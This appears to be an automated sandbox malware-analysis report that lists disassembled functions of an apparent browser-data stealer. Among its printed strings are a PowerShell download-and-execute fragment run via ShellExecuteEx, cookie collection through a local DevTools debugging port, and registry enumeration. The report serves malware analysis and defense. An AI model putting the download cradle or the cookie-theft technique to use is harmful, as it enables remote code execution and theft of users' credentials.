                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                                  • API String ID: 2238633743-3087812094
                                  • Opcode ID: 7e034b2763f63039c592fc1fec160f80eaa62b79990c657be83522bc4fac1e4a
                                  • Instruction ID: 5dbb005bffb35f98fcb61062750f322568aece9a307e2301b60bb670e0d816c3
                                  • Opcode Fuzzy Hash: 7e034b2763f63039c592fc1fec160f80eaa62b79990c657be83522bc4fac1e4a
                                  • Instruction Fuzzy Hash: 2A117CF1952764AB87389FF6A80DA553EFCBB09B0D344083AF571DA188D6F88580EB51
                                  Function 00FCBE20 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 203stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FCBE53
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FCBE86
                                  • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 00FCBE91
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCBEB1
                                  • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 00FCBEBD
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCBEE0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FCBEEB
                                  • lstrlen.KERNEL32(')"), ref: 00FCBEF6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCBF13
                                  • lstrcat.KERNEL32(00000000,')"), ref: 00FCBF1F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCBF46
                                  • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 00FCBF66
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCBF88
                                  • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 00FCBF94
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCBFBA
                                  • ShellExecuteEx.SHELL32(?), ref: 00FCC00C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 4016326548-898575020
                                  • Opcode ID: e47a657d5c0ae8ba5704d5a861271199ca7b027dbef6ee7a5e9f300a9666e53e
                                  • Instruction ID: 689cbf3aaaa4d1b82341074c8cf3b54cbd685efa18edb60be37f3ee5b8cb29d2
                                  • Opcode Fuzzy Hash: e47a657d5c0ae8ba5704d5a861271199ca7b027dbef6ee7a5e9f300a9666e53e
                                  • Instruction Fuzzy Hash: 9A61BD35E1020A9BCB21BFF68D8BAEE7BA9AF44710F04042DF515E7201DB38D941AF91
                                  Function 00FD1820 Relevance: 31.5, APIs: 25, Instructions: 269stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FD184F
                                  • lstrlen.KERNEL32(01B87218), ref: 00FD1860
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD1887
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FD1892
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD18C1
                                  • lstrlen.KERNEL32(00FE4FA0), ref: 00FD18D3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD18F4
                                  • lstrcat.KERNEL32(00000000,00FE4FA0), ref: 00FD1900
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD192F
                                  • lstrlen.KERNEL32(01B873A8), ref: 00FD1945
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD196C
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FD1977
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD19A6
                                  • lstrlen.KERNEL32(00FE4FA0), ref: 00FD19B8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD19D9
                                  • lstrcat.KERNEL32(00000000,00FE4FA0), ref: 00FD19E5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD1A14
                                  • lstrlen.KERNEL32(01B87278), ref: 00FD1A2A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD1A51
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FD1A5C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD1A8B
                                  • lstrlen.KERNEL32(01B87228), ref: 00FD1AA1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD1AC8
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FD1AD3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD1B02
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1049500425-0
                                  • Opcode ID: 7622aff46c829b088dc4bd58c34129ccceb6b4a85ea08f4e6f65e21ec8194b5a
                                  • Instruction ID: 6cb21535f4cf5a76aeee35d4a194d1418c93db182213ce31872fb60828cf8c19
                                  • Opcode Fuzzy Hash: 7622aff46c829b088dc4bd58c34129ccceb6b4a85ea08f4e6f65e21ec8194b5a
                                  • Instruction Fuzzy Hash: DC913E71A01706ABD720EFF6DC98A56B7EDBF04314B184439A896D7345DB38E881EB60
                                  Function 00FC4760 Relevance: 30.3, APIs: 18, Strings: 2, Instructions: 309stringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC4793
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00FC47C5
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC4812
                                  • lstrlen.KERNEL32(00FE4B60), ref: 00FC481D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC483A
                                  • lstrcat.KERNEL32(00000000,00FE4B60), ref: 00FC4846
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC486B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC4898
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC48A3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC48CA
                                  • StrStrA.SHLWAPI(?,00000000), ref: 00FC48DC
                                  • lstrlen.KERNEL32(?), ref: 00FC48F0
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC4931
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC49B8
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC49E1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC4A0A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC4A30
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC4A5D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                  • API String ID: 4107348322-3310892237
                                  • Opcode ID: 54d18508358f32b8921be44fe79ab0df6c4c52f0aed4e36e11d4a098cdc8907d
                                  • Instruction ID: d24e427b3c16a595e48e1cc26bc16ba765b7f73433bad05884c7d0b341d751de
                                  • Opcode Fuzzy Hash: 54d18508358f32b8921be44fe79ab0df6c4c52f0aed4e36e11d4a098cdc8907d
                                  • Instruction Fuzzy Hash: D1B17E31E1120A9BDB25FFB5DD96A9E77B9AF44310F05442CF856AB341DB38EC01AB90
                                  Function 00FB92B0 Relevance: 27.4, APIs: 13, Strings: 5, Instructions: 369stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00FB90C0: InternetOpenA.WININET(00FDCFEC,00000001,00000000,00000000,00000000), ref: 00FB90DF
                                    • Part of subcall function 00FB90C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00FB90FC
                                    • Part of subcall function 00FB90C0: InternetCloseHandle.WININET(00000000), ref: 00FB9109
                                  • strlen.MSVCRT ref: 00FB92E1
                                  • strlen.MSVCRT ref: 00FB92FA
                                    • Part of subcall function 00FB8980: std::_Xinvalid_argument.LIBCPMT ref: 00FB8996
                                  • strlen.MSVCRT ref: 00FB9399
                                  • strlen.MSVCRT ref: 00FB93E6
                                  • lstrcat.KERNEL32(?,cookies), ref: 00FB9547
                                  • lstrcat.KERNEL32(?,00FE1794), ref: 00FB9559
                                  • lstrcat.KERNEL32(?,?), ref: 00FB956A
                                  • lstrcat.KERNEL32(?,00FE4B98), ref: 00FB957C
                                  • lstrcat.KERNEL32(?,?), ref: 00FB958D
                                  • lstrcat.KERNEL32(?,.txt), ref: 00FB959F
                                  • lstrlen.KERNEL32(?), ref: 00FB95B6
                                  • lstrlen.KERNEL32(?), ref: 00FB95DB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB9614
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                                  • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                  • API String ID: 1201316467-3542011879
                                  • Opcode ID: d02a40194f06893a6bdc0fe1244f577df20cbea321825d7d2cb1ae406904f763
                                  • Instruction ID: 410cfd58863b2c0d3cd4b0047f4a338c4369f9b10556b0f5c9820465dd1c203a
                                  • Opcode Fuzzy Hash: d02a40194f06893a6bdc0fe1244f577df20cbea321825d7d2cb1ae406904f763
                                  • Instruction Fuzzy Hash: 41E14671E14218DBDF50EFA9C880ADEBBF5BF48300F1444A9E609A7241DB74AE45EF91
                                  Function 00FCD980 Relevance: 27.3, APIs: 18, Instructions: 292stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 00FCD9A1
                                  • memset.MSVCRT ref: 00FCD9B3
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00FCD9DB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCDA0E
                                  • lstrcat.KERNEL32(?,00000000), ref: 00FCDA1C
                                  • lstrcat.KERNEL32(?,01B9E0B8), ref: 00FCDA36
                                  • lstrcat.KERNEL32(?,?), ref: 00FCDA4A
                                  • lstrcat.KERNEL32(?,01B9D640), ref: 00FCDA5E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCDA8E
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00FCDA95
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FCDAFE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                                  • String ID:
                                  • API String ID: 2367105040-0
                                  • Opcode ID: 07213762bc7ded6cd4b4d9bc0d191fbda2182446f896b45adc45ad9dda5b3261
                                  • Instruction ID: 4161d5a9e0a3a75c0971a303043ee12b404e99ec7b8693a3ca37ca492433a4a3
                                  • Opcode Fuzzy Hash: 07213762bc7ded6cd4b4d9bc0d191fbda2182446f896b45adc45ad9dda5b3261
                                  • Instruction Fuzzy Hash: FDB1B071D1021A9FCB24EFA4DC85EEE7BB9AF88300F044579E516A7241DB389E44EF90
                                  Function 00FBB309 Relevance: 25.5, APIs: 20, Instructions: 451stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FBB330
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBB37E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBB3A9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FBB3B1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBB3D9
                                  • lstrlen.KERNEL32(00FE4C50), ref: 00FBB450
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBB474
                                  • lstrcat.KERNEL32(00000000,00FE4C50), ref: 00FBB480
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBB4A9
                                  • lstrlen.KERNEL32(00000000), ref: 00FBB52D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBB557
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FBB55F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBB587
                                  • lstrlen.KERNEL32(00FE4AD4), ref: 00FBB5FE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBB622
                                  • lstrcat.KERNEL32(00000000,00FE4AD4), ref: 00FBB62E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBB65E
                                  • lstrlen.KERNEL32(?), ref: 00FBB767
                                  • lstrlen.KERNEL32(?), ref: 00FBB776
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBB79E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat
                                  • String ID:
                                  • API String ID: 2500673778-0
                                  • Opcode ID: 6eb40f62c4f280122e0a73a2581c45bb5618321cc94113368572f914cf605a54
                                  • Instruction ID: 23e8a6a7169d8cc350e3fa7846e7c03869423f8c47ec55afc3c68aa200e1d388
                                  • Opcode Fuzzy Hash: 6eb40f62c4f280122e0a73a2581c45bb5618321cc94113368572f914cf605a54
                                  • Instruction Fuzzy Hash: 11024F30E01205CFDB29DF96D988AAAB7F5AF40324F19806DE4099B355D7B5DC82EF81
                                  Function 00FD3760 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 222registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00FD71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00FD71FE
                                  • RegOpenKeyExA.ADVAPI32(?,01B9B418,00000000,00020019,?), ref: 00FD37BD
                                  • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00FD37F7
                                  • wsprintfA.USER32 ref: 00FD3822
                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00FD3840
                                  • RegCloseKey.ADVAPI32(?), ref: 00FD384E
                                  • RegCloseKey.ADVAPI32(?), ref: 00FD3858
                                  • RegQueryValueExA.ADVAPI32(?,01B9E730,00000000,000F003F,?,?), ref: 00FD38A1
                                  • lstrlen.KERNEL32(?), ref: 00FD38B6
                                  • RegQueryValueExA.ADVAPI32(?,01B9E6D0,00000000,000F003F,?,00000400), ref: 00FD3927
                                  • RegCloseKey.ADVAPI32(?), ref: 00FD3972
                                  • RegCloseKey.ADVAPI32(?), ref: 00FD3989
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
